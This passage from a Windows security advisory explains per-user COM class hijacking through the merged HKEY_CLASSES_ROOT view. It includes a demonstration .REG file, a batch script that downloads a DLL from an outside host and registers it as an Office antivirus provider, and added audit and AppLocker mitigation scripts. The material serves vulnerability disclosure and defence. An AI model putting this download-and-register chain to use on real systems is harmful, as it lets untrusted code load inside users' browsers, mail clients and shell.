The use of environment variables within pathnames serves no (good) purpose: it is not just deprecated and superfluous but outright dangerous, as it enables attacks like those shown above in the first place, and must therefore be avoided and banned!

Case 3

Windows 2000 introduced the merged view of the HKEY_CLASSES_ROOT virtual Registry tree.

Thanks to this feature, COM classes and interfaces registered by (unprivileged) users below the user's HKEY_CURRENT_USER\Software\Classes Registry key shadow the corresponding COM classes and interfaces registered (by administrators) below the machine's HKEY_LOCAL_MACHINE\SOFTWARE\Classes Registry key: the merged view takes the per-user entry whenever both exist, so every process running in the user's context loads the user's (in-process) server instead of the machine's.

Note: the resulting well-known weakness is documented as CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC.

Demonstration

On a 32-bit installation of Windows XP SP2 or any newer version of Windows perform the following 6 simple steps (adaptation for 64-bit installations is left as an exercise for the reader).
  1. Log on to an arbitrary (unprivileged) user account.

  2. Download the SENTINEL.DLL of the Vulnerability and Exploit Detector and save it in an arbitrary directory.

  3. Create a text file SENTINEL.REG with the following contents:

    REGEDIT4
    
    ; Copyright © 2004-2020, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
    @="Vulnerability and Exploit Detector"
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
    @="MSOfficeAntiVirus"
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
    ; NOTE: replace ‹path› with the directory used in step 2.
    @="‹path›\\SENTINEL.DLL"
    "ThreadingModel"="Both"
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
    @="{2781761E-28E0-4109-99FE-B9D127C57AFE}"
    
    ; NOTE: the following entries are optional and can be omitted!
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
    @="IOfficeAntiVirus"
    
    [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
    @="IOfficeAntiVirus"
    
    [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
    @="{00000000-0000-0000-C000-000000000046}" ; IUnknown
    
    [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
    @="4"
  4. Double-click the file SENTINEL.REG created in step 3 to merge it into the user’s Registry.

  5. Run the following command line to verify the proper registration of the COM class:

    RUNDLL32.EXE /STA {2781761E-28E0-4109-99FE-B9D127C57AFE}
  6. Download an arbitrary (portable executable) file with your WWW browser, for example SENTINEL.EXE, or save an attachment in your mail client, and notice the message boxes displayed from the SENTINEL.DLL downloaded in step 2.
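The following PowerShell script, added here as an example (it is neither the page's own code nor part of the batch script below), audits the per-user half of the merged HKEY_CLASSES_ROOT view for the two conditions Case 3 and the steps above rely on: classes that claim the MSOfficeAntiVirus category from the user's hive, and per-user CLSIDs that shadow machine-wide ones. The Registry paths and the category GUID are those used above; the function names and output columns are this example's own.

```powershell
# Added example, not part of the original page: audit the per-user half of the
# merged HKEY_CLASSES_ROOT view. Registry paths and the MSOfficeAntiVirus category
# GUID are as used on the page; function names and output columns are this example's own.

$CatidMsOfficeAntiVirus = '{56FFCC30-D398-11D0-B2AE-00A0C908FA49}'

function Get-OfficeAntiVirusProvider {
    # Every class in the merged view that claims the MSOfficeAntiVirus category: this is
    # the set an IOfficeAntiVirus caller (browser, mail client, shell) enumerates and
    # instantiates. The WOW6432Node branch is what 32-bit callers see on 64-bit Windows.
    foreach ($root in 'HKEY_CLASSES_ROOT\CLSID', 'HKEY_CLASSES_ROOT\WOW6432Node\CLSID') {
        $userRoot    = $root -replace '^HKEY_CLASSES_ROOT', 'HKEY_CURRENT_USER\Software\Classes'
        $machineRoot = $root -replace '^HKEY_CLASSES_ROOT', 'HKEY_LOCAL_MACHINE\SOFTWARE\Classes'
        Get-ChildItem -LiteralPath "Registry::$root" -ErrorAction SilentlyContinue | ForEach-Object {
            $clsid = $_.PSChildName
            if (-not (Test-Path -LiteralPath "Registry::$root\$clsid\Implemented Categories\$CatidMsOfficeAntiVirus")) { return }
            [pscustomobject]@{
                View           = $root
                CLSID          = $clsid
                InprocServer32 = (Get-ItemProperty -LiteralPath "Registry::$root\$clsid\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
                TreatAs        = (Get-ItemProperty -LiteralPath "Registry::$root\$clsid\TreatAs" -ErrorAction SilentlyContinue).'(default)'
                PerUser        = Test-Path -LiteralPath "Registry::$userRoot\$clsid"
                MachineWide    = Test-Path -LiteralPath "Registry::$machineRoot\$clsid"
            }
        }
    }
}

function Get-ShadowedComClass {
    # Every CLSID present in both hives: the merged view prefers the per-user key, so the
    # per-user InprocServer32 is what gets loaded, whatever the machine-wide one says.
    foreach ($branch in 'CLSID', 'WOW6432Node\CLSID') {
        $userRoot = Get-Item -LiteralPath "Registry::HKEY_CURRENT_USER\Software\Classes\$branch" -ErrorAction SilentlyContinue
        if (-not $userRoot) { continue }
        foreach ($clsid in $userRoot.GetSubKeyNames()) {
            $machineKey = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\$branch\$clsid"
            if (-not (Test-Path -LiteralPath $machineKey)) { continue }
            [pscustomobject]@{
                Branch        = $branch
                CLSID         = $clsid
                UserServer    = (Get-ItemProperty -LiteralPath "$($userRoot.PSPath)\$clsid\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
                MachineServer = (Get-ItemProperty -LiteralPath "$machineKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
            }
        }
    }
}

# Anything per-user in either list is a hijack candidate. The SENTINEL.DLL registration
# from the steps above appears in the first list with PerUser = True and MachineWide = False.
Get-OfficeAntiVirusProvider | Format-Table -AutoSize
Get-ShadowedComClass        | Format-Table -AutoSize
```

The script only reads; to undo the demonstration, delete the per-user CLSID key (Remove-Item -Recurse on the HKEY_CURRENT_USER\Software\Classes\CLSID key shown in the .REG file), after which the merged view falls back to the machine-wide registration.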

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows XP and newer versions of Windows.
Rem Copyright © 2004-2020, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER IOAV /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

Start https://skanthak.homepage.t-online.de/download/SENTINEL.EXE

If "%PROCESSOR_ARCHITECTURE%" == "AMD64" Goto :AMD64
If "%PROCESSOR_ARCHITEW6432%" == "AMD64" Goto :WOW6432
If "%PROCESSOR_ARCHITECTURE%" == "x86" Goto :I386
Exit /B

:AMD64
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Goto :COMMON

:WOW6432
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%ProgramW6432%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Rem No Goto here: fall through to :I386 to register the 32-bit DLL in the WOW64 view too.

:I386
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

:COMMON
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Start https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
Start "IOAV" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Exit /B

Mitigation

Use Software Restriction Policies or AppLocker (with DLL rules enabled) to deny the loading of DLLs from directories writable by unprivileged users, such as the user's profile and %TMP%, where the demonstrations above place SENTINEL.DLL: a COM server that cannot be loaded cannot be hijacked into the browser, mail client or shell.
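The following PowerShell script, added here as an example (it is not code from the original page), builds an AppLocker DLL rule collection that allows libraries only below %WINDIR% and %PROGRAMFILES% (plus AppLocker's usual "Administrators may run everything" rule) and dry-runs it against the same binary in two locations. The policy schema and the cmdlets are Microsoft's; the file names, rule names and the probe copy of kernel32.dll are this example's assumptions.

```powershell
# Added example, not from the original page: an AppLocker DLL rule collection that
# allows libraries only below %WINDIR% and %PROGRAMFILES%, so a DLL registered from a
# user-writable directory such as %TMP% is refused when a process tries to load it.
# Policy schema and cmdlets are Microsoft's; file names, rule names and the probe
# copy of kernel32.dll are this example's assumptions.

$rules = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Dll" EnforcementMode="Enabled">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow DLLs from the Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow DLLs from the Program Files folders" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow Administrators everything" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@

$policyPath = Join-Path $env:TEMP 'dll-rules.xml'
Set-Content -LiteralPath $policyPath -Value $rules -Encoding UTF8

# Probe: the same binary once in System32 and once copied into %TMP%, which is where
# the batch script above drops SENTINEL.DLL. Only the location differs.
$probeDll = Join-Path $env:TEMP 'SENTINEL.DLL'
Copy-Item -LiteralPath "$env:SystemRoot\System32\kernel32.dll" -Destination $probeDll -Force

# Dry run: no policy is applied, AppLocker only reports what it would decide.
Test-AppLockerPolicy -XmlPolicy $policyPath -Path "$env:SystemRoot\System32\kernel32.dll", $probeDll -User Everyone |
    Select-Object FilePath, PolicyDecision, MatchingRule

# To enforce (administrative rights, an edition that enforces AppLocker and a running
# Application Identity service are required):
#   Set-AppLockerPolicy -XmlPolicy $policyPath
```

The copy in %TMP% matches no allow rule and is therefore reported as denied by the default rule, while the copy in System32 is allowed by the %WINDIR% rule. A Software Restriction Policy with the default level set to "Disallowed" and the DLL check enabled achieves the same effect on versions of Windows without AppLocker.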

Contact

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tips, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Copyright © 1995–2020 • Stefan Kanthak • <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>